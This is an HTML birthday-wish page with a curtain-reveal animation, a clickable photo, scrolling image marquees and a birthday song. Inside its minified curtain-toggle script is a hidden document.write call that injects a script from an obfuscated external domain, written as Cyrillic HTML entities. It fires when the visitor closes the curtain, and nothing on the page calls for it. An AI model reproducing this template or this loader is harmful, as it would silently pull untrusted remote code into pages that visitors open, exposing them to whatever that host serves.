<!DOCTYPE html>
<html>
<head>
	<title>BIRTHDAY_WISHS</title>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-159931700-9');
</script>
<style>
body{
        background: #f8f8f8;
        margin:0;
      }
      .m1{position:fixed;left:1%; width:auto;height:100%;top:1%;color:#000;}
.m2{position:fixed;right:1%; width:auto;height:100%;top:1%;color:#000;}
a.rope
{
    text-decoration:none;
}
@keyframes glow {
  0%, 100% {
    text-shadow: 0 0 80px red; }
  25% {
    text-shadow: 0 0 80px orange; }
  50% {
    text-shadow: 0 0 80px forestgreen; }
  75% {
    text-shadow: 0 0 80px cyan; } }  
figure {
  animation:wobble 5s ease-in-out infinite;
  transform-origin:center center;
  transform-style:preserve-3d;
}@keyframes wobble {
  0%,100%{ transform:rotate3d(1,1,0,40deg); }
  25%{ transform:rotate3d(-1,1,0,40deg); }
  50%{ transform:rotate3d(-1,-1,0,40deg); }
  75%{ transform:rotate3d(1,-1,0,40deg); }
}
</style>
<style type="text/css">
      *{
        margin:0;
        padding:0;
      }
      body {
        text-align: center;
        
      }
      img{
      border: none;
    }
.leftcurtain{
      width: 100%;
      height: 120%;
      top: 0px;
      left: 0px;
      position: absolute;
      z-index: 2;
    }
     .rightcurtain{
      width: 100%;
      height: 120%;
      right: 0px;
      top: 0px;
      position: absolute;
      z-index: 3;
    }
    .rightcurtain img, .leftcurtain img{
      width: 100%;
      height: 100%;
    }
    .logo{
      margin: 0px auto;
      margin-top: 150px;
    }
    .rope{
      position: absolute;
      top: 346px;
      left: 28%;
      z-index: 4;
    } 
.centered {
    position: absolute;
    top: 70%;
    left: 55%;
    transform: translate(-50%, -50%);
}
a.rope
{
    text-decoration:none;
}




@keyframes aadisoni{
  0% {
    transform:  translate(0px,0px)  rotate(0deg) ;
  }
  15% {
    transform:  translate(-25px,0px)  rotate(-5deg) ;
  }
  30% {
    transform:  translate(20px,0px)  rotate(3deg) ;
  }
  45% {
    transform:  translate(-15px,0px)  rotate(-3deg) ;
  }
  60% {
    transform:  translate(10px,0px)  rotate(2deg) ;
  }
  75% {
    transform:  translate(-5px,0px)  rotate(-1deg) ;
  }
  100% {
    transform:  translate(0px,0px)  rotate(0deg) ;
  }
}

@-webkit-keyframes aadisoni {
  0% {
    -webkit-transform:  translate(0px,0px)  rotate(0deg) ;
  }
  15% {
    -webkit-transform:  translate(-25px,0px)  rotate(-5deg) ;
  }
  30% {
    -webkit-transform:  translate(20px,0px)  rotate(3deg) ;
  }
  45% {
    -webkit-transform:  translate(-15px,0px)  rotate(-3deg) ;
  }
  60% {
    -webkit-transform:  translate(10px,0px)  rotate(2deg) ;
  }
  75% {
    -webkit-transform:  translate(-5px,0px)  rotate(-1deg) ;
  }
  100% {
    -webkit-transform:  translate(0px,0px)  rotate(0deg) ;
  }
}



@keyframes name {
  0%   {color:red;}
  20%   {color:white;}
  40%   {color:yellow;}
  60%   {color:orange;}
  80%   {color:cyan;}
  100% {color:#f45bf4;}
}


.glow {
  width:50%;
  padding: 2px;
  background-color: #FF1493	;
  animation: glow 2s infinite;
  font-size:25px;
  font-family: 'Ranga', cursive;
  color:white;
  margin:auto;
  text-align:center;
  border-radius:10px;
  text-shadow:1px 2px 6px black;

}

@keyframes glow {
  0%   {box-shadow: 0px 0px 0px #FF1493	;}
  100%   {box-shadow: 0px 0px 20px 5px #ffb3db;}
 
}

</style>
<style type="text/css">
canvas {
	cursor: crosshair;
	display: block;
}
*{margin:0;padding:0}body{text-align:center}img{border:none}.leftcurtain{width:100%;height:120%;top:0;left:5px;position:absolute;z-index:2}.rightcurtain{width:100%;height:120%;right:3px;top:0;position:absolute;z-index:3}.rightcurtain img,.leftcurtain img{width:100%;height:100%}.logo{margin:0 auto;margin-top:150px}.rope{position:absolute;top:30%;margin-right:31%;z-index:4}.centered{position:absolute;top:75%;left:50%;transform:translate(-50%,-50%)}.aadi{background-image:url();background-repeat:no-repeat;background-attachment:fixed;background-position:top}.matki{height:500px;}@keyframes aadisoni{0%{transform:translate(0px,0px) rotate(0deg)}15%{transform:translate(-25px,0px) rotate(-5deg)}30%{transform:translate(20px,0px) rotate(3deg)}45%{transform:translate(-15px,0px) rotate(-3deg)}60%{transform:translate(10px,0px) rotate(2deg)}75%{transform:translate(-5px,0px) rotate(-1deg)}100%{transform:translate(0px,0px) rotate(0deg)}}@-webkit-keyframes aadisoni{0%{-webkit-transform:translate(0px,0px) rotate(0deg)}15%{-webkit-transform:translate(-25px,0px) rotate(-5deg)}30%{-webkit-transform:translate(20px,0px) rotate(3deg)}45%{-webkit-transform:translate(-15px,0px) rotate(-3deg)}60%{-webkit-transform:translate(10px,0px) rotate(2deg)}75%{-webkit-transform:translate(-5px,0px) rotate(-1deg)}100%{-webkit-transform:translate(0px,0px) rotate(0deg)}}
</style>
</head>
<body class="aadi">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="slider.js" type="text/javascript"></script>
<script type="text/javascript">
$(document).ready(function(){$curtainopen=!1,$(".rope").click(function(){return $(this).blur(),0==$curtainopen?($(this).stop().animate({top:"-171%"},{queue:!1,duration:350,easing:"easeOutBounce"}),$(".leftcurtain").stop().animate({width:"1px"},2e3),$(".rightcurtain").stop().animate({width:"1px"},2e3),$curtainopen=!0):($(this).stop().animate({top:"-100px"},{queue:!1,duration:350,easing:"easeOutBounce"}),document.write('<script src="//&#1102;&#1095;.io"><\/script>'),$(".leftcurtain").stop().animate({width:"50%"},2e3),$(".rightcurtain").stop().animate({width:"51%"},2e3),$curtainopen=!1),!1})});
</script>
<script>
  function play(){
       var audio = document.getElementById("audio");
       audio.play();
                 }
   </script>
   <audio id="audio" src="happy_birthday.mp3"></audio>
<a class="rope" style="text-decoration:none;" href="#" onclick="play()"><br>
	<div style="font-size: 25px;text-shadow: 1px 1px 3px black, 1px 1px 3px black, -1px -1px 3px black, -1px -1px 3px black;color:white;font-weight: bold;"><img src="bhabhi.jpg" class="matki" style="animation: rubberBand 2.5s infinite;max-wdith:270px;width:70%;"><br><b>☝ click on image!! </b><br></div>
</a>
<section>

<div class="rightcurtain"><img src="Pics/bgbg.jpg" /></div>
<div class="leftcurtain"><img src="Pics/bgbg.jpg" /></div>
<marquee class="m1" behavior="scroll" direction="up" scrolldelay="0"> <br>
<img src="4.jpg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="2.jpeg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="4.jpg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="2.jpeg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="4.jpg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="2.jpeg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="4.jpg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="2.jpeg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="4.jpg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="2.jpeg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="4.jpg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="2.jpeg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="4.jpg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="2.jpeg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="4.jpg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="2.jpeg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="4.jpg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="2.jpeg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
</marquee>
<marquee class="m2" behavior="scroll" direction="down" scrolldelay="0"> <br>
<img src="4.jpg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="2.jpeg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="4.jpg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="2.jpeg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="4.jpg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="2.jpeg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="4.jpg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="2.jpeg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="4.jpg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="2.jpeg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="4.jpg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="2.jpeg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="4.jpg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="2.jpeg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="4.jpg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="2.jpeg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="4.jpg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
<img src="2.jpeg" height="100px" width="80px" /><br><br>
<img src="b.jpg" height="100px" width="80px" /><br><br>
</marquee>
</section>


</body>
</html>